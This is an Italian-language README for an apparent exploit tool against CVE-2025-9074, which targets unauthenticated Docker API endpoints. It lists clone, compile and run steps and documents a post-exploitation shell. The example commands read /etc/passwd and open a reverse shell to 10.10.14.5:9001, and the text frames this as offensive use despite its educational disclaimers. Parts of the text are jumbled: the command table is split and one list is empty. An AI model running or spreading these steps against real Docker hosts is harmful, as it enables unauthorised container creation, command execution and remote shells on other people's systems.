
PoC Docker API CVE-2025-9074 (Proof-Of-Concept). Un framework di exploitation sofisticato per CVE-2025-9074, che prende di mira endpoint Docker API non autenticati con una shell di comando interattiva integrata.
Un sofisticato framework di exploitation per CVE-2025-9074, che prende di mira endpoint Docker API non autenticati, dotato di una shell interattiva integrata per l'esecuzione dei comandi.
Questo strumento automatizza lo sfruttamento di istanze Docker API esposte senza autenticazione, consentendo la piena creazione di container e l'esecuzione di comandi sull'host di destinazione. Lo strumento include una shell interattiva personalizzata per operazioni post-exploitation senza interruzioni.
Nota: questa è un'implementazione PoC personalizzata. Non ho scoperto CVE-2025-9074.

Rilevamento automatico delle vulnerabilità, pull dell'immagine, creazione e inizializzazione del container

Shell post-exploitation con capacità di esecuzione dei comandi
git clone https://github.com/xwpdx0/poc-2025-9074
gcc poc.c -o poc-2025-9074
oppure puoi scaricare il binario dalla sezione Releases
./poc-2025-9074
Esegui contro il target predefinito (127.0.0.1:2375):
./poc-2025-9074
Specifica un endpoint Docker API personalizzato:

Dopo lo sfruttamento riuscito, una shell interattiva fornisce i seguenti comandi:
| Comando | Descrizione |
|---|---|
cmd <command> | Esegui comandi arbitrari all'interno del container |
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info
CVE-2025-9074 colpisce le istanze Docker con endpoint API esposti privi di meccanismi di autenticazione adeguati. Questa errata configurazione consente accessi non autorizzati al daemon Docker, permettendo di:
Questo strumento è fornito solo per scopi educativi e di test di sicurezza autorizzati.
xwpd (@xwpdx0)
MIT License - Vedere il file LICENSE per i dettagli
Solo per scopi di divulgazione responsabile e ricerca sulla sicurezza.
revshell <ip> <port>| Distribuisci una reverse shell verso un listener specificato |
info | Mostra le informazioni correnti su container e target |
exit | Termina la sessione interattiva |